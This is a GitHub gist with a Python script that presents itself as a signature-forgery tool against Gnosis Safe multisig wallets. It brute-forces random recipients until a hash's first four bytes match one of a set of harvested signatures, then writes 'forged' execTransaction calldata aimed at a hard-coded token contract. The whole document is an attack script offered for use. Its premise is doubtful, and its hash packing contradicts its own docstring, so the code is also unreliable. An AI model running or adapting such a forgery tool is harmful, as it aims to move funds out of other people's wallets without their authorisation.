Created
June 2, 2025 18:41
-
-
Save FoobarProtocol/cb343bf5ebdeec7171fc3287bb912146 to your computer and use it in GitHub Desktop.
This script allows us to find the first 4 bytes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
safe_prefix_collision_miner.py | |
Parallel “4-byte-prefix” collision miner for Gnosis Safe’s buggy EIP-191 fallback, | |
with manual ABI-pack of `execTransaction(...)` calldata (no eth_abi dependency). | |
Usage: | |
python3 safe_prefix_collision_miner.py \ | |
--catalogue safe_signature_catalogue.csv \ | |
--nonce 71 \ | |
--output forged_prefix_calldata.hex \ | |
--max-iter 2000000 \ | |
--workers 4 | |
Dependencies: | |
pip install eth-utils pycryptodome | |
""" | |
import argparse | |
import csv | |
import os | |
import random | |
import sys | |
from typing import List, Dict, Set, Optional | |
from concurrent.futures import ProcessPoolExecutor, as_completed | |
from Crypto.Hash import keccak | |
from eth_utils import to_checksum_address, to_bytes, to_int | |
# ───────────────────────────────────────────────────────────────────────────── | |
# Adjusted constants per your feedback | |
SAFE_TX_TYPEHASH = bytes.fromhex( | |
"bb8310d486368db6bd6f849402fdd73ad53d316b5a4b2644ad6efe0f941286d8" | |
) | |
DOMAIN_SEPARATOR = bytes.fromhex( | |
"b3ded2bdbff5db1a87f6d551fa256e9f2bd6517a3bb84f4c2ea863fb3a559622" | |
) | |
TOKEN_CONTRACT_ADDRESS = "0x96221423681a6d52e184d440a8efcebb105c7242" | |
VALUE = 0 | |
OPERATION = 1 | |
SAFE_TX_GAS = 45746 | |
BASE_GAS = 0 | |
GAS_PRICE = 0 | |
GAS_TOKEN = "0x0000000000000000000000000000000000000000" | |
REFUND_RECEIVER = "0x0000000000000000000000000000000000000000" | |
# execTransaction selector: keccak256("execTransaction(address,uint256,bytes,uint8,uint256,uint256,uint256,address,address,bytes)")[0:4] | |
EXECUTE_SELECTOR = b"\x6a\x76\x12\x02" | |
# ERC-20 transfer selector (to, value=0): "a9059cbb" | |
ERC20_TRANSFER_SELECTOR = bytes.fromhex("a9059cbb") | |
ZERO_32_BYTES = b"\x00" * 32 | |
SEQPREFIX = ZERO_32_BYTES[:12] # for left-padding 20-byte address to 32 bytes | |
# Prefix for EIP-191 personal_sign | |
ETH_PERSONAL_PREFIX = b"\x19Ethereum Signed Message:\n32" | |
# ───────────────────────────────────────────────────────────────────────────── | |
def keccak256(data: bytes) -> bytes: | |
h = keccak.new(digest_bits=256) | |
h.update(data) | |
return h.digest() | |
def wrap_eip191(msg_hash: bytes) -> bytes: | |
return keccak256(ETH_PERSONAL_PREFIX + msg_hash) | |
def build_safe_tx_hash(to_addr: str, data_hash: bytes, nonce: int) -> bytes: | |
""" | |
Computes: | |
keccak256( | |
SAFE_TX_TYPEHASH ∥ to(32B) ∥ value(32B) ∥ data_hash(32B) ∥ operation(32B) ∥ | |
safeTxGas(32B) ∥ baseGas(32B) ∥ gasPrice(32B) ∥ gasToken(32B) ∥ | |
refundReceiver(32B) ∥ nonce(32B) | |
) | |
""" | |
to_bytes20 = bytes.fromhex(to_addr[2:]) | |
to_padded = b"\x00" * 12 + to_bytes20 # left-pad to 32 bytes | |
packed = ( | |
SAFE_TX_TYPEHASH + | |
(VALUE).to_bytes(32, byteorder="big") + | |
to_padded + | |
data_hash + | |
(OPERATION).to_bytes(32, byteorder="big") + | |
(SAFE_TX_GAS).to_bytes(32, byteorder="big") + | |
(BASE_GAS).to_bytes(32, byteorder="big") + | |
(GAS_PRICE).to_bytes(32, byteorder="big") + | |
(0).to_bytes(12, byteorder="big") + bytes.fromhex(GAS_TOKEN[2:]) + | |
(0).to_bytes(12, byteorder="big") + bytes.fromhex(REFUND_RECEIVER[2:]) + | |
nonce.to_bytes(32, byteorder="big") | |
) | |
return keccak256(packed) | |
def build_eip712_hash(safe_tx_hash: bytes) -> bytes: | |
""" | |
final EIP-712 digest = keccak256(0x19 ∥ 0x01 ∥ domainSeparator ∥ safeTxHash) | |
""" | |
return keccak256(b"\x19\x01" + DOMAIN_SEPARATOR + safe_tx_hash) | |
def abi_encode_uint256(value: int) -> bytes: | |
"""Encode a uint256 as 32-byte big-endian.""" | |
return value.to_bytes(32, byteorder="big") | |
def abi_encode_address(addr: str) -> bytes: | |
""" | |
Encode an address (string '0x...' ) to 32 bytes | |
by left-padding 20-byte address. | |
""" | |
b20 = bytes.fromhex(addr[2:]) | |
return b"\x00" * 12 + b20 | |
def abi_encode_bytes_dynamic(blob: bytes) -> bytes: | |
""" | |
Encode a dynamic `bytes` blob under ABI rules: | |
1) 32-byte length | |
2) `blob` itself | |
3) zero-pad to a multiple of 32 bytes | |
""" | |
length = len(blob).to_bytes(32, byteorder="big") | |
padded_len = ((len(blob) + 31) // 32) * 32 | |
padding = b"\x00" * (padded_len - len(blob)) | |
return length + blob + padding | |
def build_exec_tx_calldata_manual( | |
to_addr: str, | |
recipient: bytes, | |
nonce: int, | |
signature_blob: bytes | |
) -> bytes: | |
""" | |
Manually build the ABI-encoded calldata for: | |
execTransaction( | |
address to, | |
uint256 value, | |
bytes data, | |
uint8 operation, | |
uint256 safeTxGas, | |
uint256 baseGas, | |
uint256 gasPrice, | |
address gasToken, | |
address refundReceiver, | |
bytes signatures | |
) | |
without using eth_abi. Logic: | |
HEAD (10 slots, each 32 bytes): | |
0: to (32 bytes) | |
1: value (32) | |
2: offset_data (32) → 0x... (0x140 = 320) | |
3: operation (32) | |
4: safeTxGas (32) | |
5: baseGas (32) | |
6: gasPrice (32) | |
7: gasToken (32) | |
8: refundReceiver (32) | |
9: offset_sigs (32) → 0x... (depends on data length) | |
TAIL: | |
[ data-packed: length(32) ∥ data ∥ pad ] | |
[ sigs-packed: length(32) ∥ sig_blob ∥ pad ] | |
""" | |
# 1) Build `data_full` = ERC20_TRANSFER_SELECTOR ∥ pad32(recipient) ∥ uint256(0) | |
param1 = SEQPREFIX + recipient | |
param2 = (0).to_bytes(32, byteorder="big") | |
data_full = ERC20_TRANSFER_SELECTOR + param1 + param2 | |
data_hash = keccak256(data_full) | |
# 2) Compute the inner safeTxHash → EIP-712 → EIP-191 logic separately | |
safe_hash = build_safe_tx_hash(to_addr, data_hash, nonce) | |
_ = build_eip712_hash(safe_hash) # not needed here, we just needed wrap for collision search | |
# 3) HEAD construction | |
# offset_data = 32 * 10 = 320 = 0x140 | |
offset_data = (32 * 10).to_bytes(32, byteorder="big") | |
# data_full len = len(data_full) = 4 + 32 + 32 = 68 bytes ⇒ padded to 96 | |
data_packed = abi_encode_bytes_dynamic(data_full) | |
padded_data_len = len(data_packed) # 96 | |
# offset_sigs = offset_data + padded_data_len = 320 + 96 = 416 = 0x1a0 | |
offset_sigs_int = 32 * 10 + padded_data_len | |
offset_sigs = offset_sigs_int.to_bytes(32, byteorder="big") | |
head = ( | |
EXECUTE_SELECTOR + | |
abi_encode_address(to_addr) + | |
abi_encode_uint256(VALUE) + | |
offset_data + | |
abi_encode_uint256(OPERATION) + | |
abi_encode_uint256(SAFE_TX_GAS) + | |
abi_encode_uint256(BASE_GAS) + | |
abi_encode_uint256(GAS_PRICE) + | |
abi_encode_address(GAS_TOKEN) + | |
abi_encode_address(REFUND_RECEIVER) + | |
offset_sigs | |
) | |
# (After EXECUTE_SELECTOR, head has 10 × 32 = 320 bytes.) | |
# 4) TAIL construction | |
# data_packed: [ len(32) ∥ data_full ∥ pad ] | |
# sig_packed: [ len(32) ∥ signature_blob ∥ pad ] | |
sig_packed = abi_encode_bytes_dynamic(signature_blob) | |
calldata = head + data_packed + sig_packed | |
return calldata | |
def load_catalogue(csv_path: str) -> List[Dict]: | |
""" | |
Load CSV with columns: | |
proxy, tx, r, s, v, h712, h191 | |
""" | |
catalogue = [] | |
with open(csv_path, newline="") as f: | |
reader = csv.DictReader(f) | |
for row in reader: | |
row["r"] = row["r"].strip() | |
row["s"] = row["s"].strip() | |
row["v"] = int(row["v"]) | |
row["h712"] = row["h712"].strip() | |
row["h191"] = row["h191"].strip() | |
catalogue.append(row) | |
return catalogue | |
def build_prefix_map( | |
catalogue: List[Dict], | |
prefix_len: int = 4 | |
) -> (Set[bytes], Dict[bytes, List[Dict]]): | |
""" | |
Build a set of all 4-byte prefixes of every h712 and h191, | |
and a map from prefix → list of catalogue rows that share it. | |
""" | |
prefix_set: Set[bytes] = set() | |
prefix_map: Dict[bytes, List[Dict]] = {} | |
for row in catalogue: | |
for field in ("h712", "h191"): | |
digest = bytes.fromhex(row[field][2:]) | |
pref = digest[:prefix_len] | |
prefix_set.add(pref) | |
prefix_map.setdefault(pref, []).append(row) | |
return prefix_set, prefix_map | |
def worker_task( | |
prefix_set: Set[bytes], | |
prefix_map: Dict[bytes, List[Dict]], | |
seed: int, | |
chunk_size: int, | |
to_address: str, | |
nonce: int | |
) -> Optional[Dict]: | |
""" | |
Runs `chunk_size` trials of random recipients (160 bits). If wrap_digest[:4] | |
matches any prefix in prefix_set, return a dict with: | |
{ 'prefix': bytes(4), | |
'recipient': bytes(20), | |
'wrap_digest': bytes(32), | |
'matches': List[Dict] } | |
Otherwise None. | |
""" | |
rnd = random.Random(seed) | |
for _ in range(chunk_size): | |
candidate = rnd.getrandbits(160).to_bytes(20, byteorder="big") | |
# 1) data_full = ERC20_TRANSFER_SELECTOR ∥ pad32(recipient) ∥ 32B(0) | |
param1 = SEQPREFIX + candidate | |
param2 = (0).to_bytes(32, byteorder="big") | |
data_full = ERC20_TRANSFER_SELECTOR + param1 + param2 | |
data_hash = keccak256(data_full) | |
# 2) safeTxHash → EIP-712 message hash | |
safe_hash = build_safe_tx_hash(to_address, data_hash, nonce) | |
msg_hash = build_eip712_hash(safe_hash) | |
# 3) wrap (EIP-191) | |
wrap_digest = wrap_eip191(msg_hash) | |
pref = wrap_digest[:4] | |
if pref in prefix_set: | |
return { | |
"prefix": pref, | |
"recipient": candidate, | |
"wrap_digest": wrap_digest, | |
"matches": prefix_map[pref] | |
} | |
return None | |
# ───────────────────────────────────────────────────────────────────────────── | |
def main(): | |
parser = argparse.ArgumentParser( | |
description=( | |
"Parallel 4-byte prefix collision miner for Safe’s buggy EIP-191 fallback." | |
) | |
) | |
parser.add_argument( | |
"--catalogue", required=True, | |
help="Path to safe_signature_catalogue.csv" | |
) | |
parser.add_argument( | |
"--nonce", type=int, required=True, | |
help="Safe nonce (decimal, e.g. 71)" | |
) | |
parser.add_argument( | |
"--output", required=True, | |
help="Write forged calldata (hex) to this file" | |
) | |
parser.add_argument( | |
"--max-iter", type=int, default=1_000_000, | |
help="Total number of random attempts across all workers" | |
) | |
parser.add_argument( | |
"--workers", type=int, default=os.cpu_count(), | |
help="Number of parallel processes" | |
) | |
args = parser.parse_args() | |
catalogue = load_catalogue(args.catalogue) | |
prefix_set, prefix_map = build_prefix_map(catalogue, prefix_len=4) | |
print(f"Loaded {len(catalogue)} signatures; {len(prefix_set)} distinct 4-byte prefixes.") | |
to_address = to_checksum_address(TOKEN_CONTRACT_ADDRESS) | |
total_iters = args.max_iter | |
workers = max(1, args.workers) | |
chunk = total_iters // workers | |
print(f"Running {total_iters:,} trials across {workers} processes (~{chunk:,} each).") | |
with ProcessPoolExecutor(max_workers=workers) as executor: | |
futures = [] | |
for i in range(workers): | |
seed = random.randrange(2**32) | |
futures.append( | |
executor.submit( | |
worker_task, | |
prefix_set, | |
prefix_map, | |
seed, | |
chunk, | |
to_address, | |
args.nonce | |
) | |
) | |
for fut in as_completed(futures): | |
res = fut.result() | |
if res is None: | |
continue | |
# a worker found a prefix match → cancel the others | |
for f in futures: | |
f.cancel() | |
pref = res["prefix"] | |
recipient = res["recipient"] | |
wrap_digest = res["wrap_digest"] | |
matches = res["matches"] | |
print(f"\n=== Found 4-byte prefix collision! ===") | |
print(f"Prefix (4 bytes): 0x{pref.hex()}") | |
print(f"Recipient : 0x{recipient.hex()}") | |
print(f"Full wrap digest : 0x{wrap_digest.hex()}\n") | |
print("Matching catalogue entries (first shown):") | |
chosen = matches[0] | |
print(f" Proxy: {chosen['proxy']}") | |
print(f" TX : {chosen['tx']}") | |
print(f" v : {chosen['v']}") | |
print(f" r : {chosen['r']}") | |
print(f" s : {chosen['s']}\n") | |
chosen_r = bytes.fromhex(chosen["r"][2:]) | |
chosen_s = bytes.fromhex(chosen["s"][2:]) | |
chosen_v = chosen["v"] | |
sig_blob = chosen_r + chosen_s + chosen_v.to_bytes(1, byteorder="big") | |
calldata = build_exec_tx_calldata_manual(to_address, recipient, args.nonce, sig_blob) | |
hexout = "0x" + calldata.hex() | |
with open(args.output, "w") as of: | |
of.write(hexout) | |
print(f"Forged calldata written to {args.output}") | |
return | |
print(f"No 4-byte prefix collision found in {total_iters:,} attempts.") | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment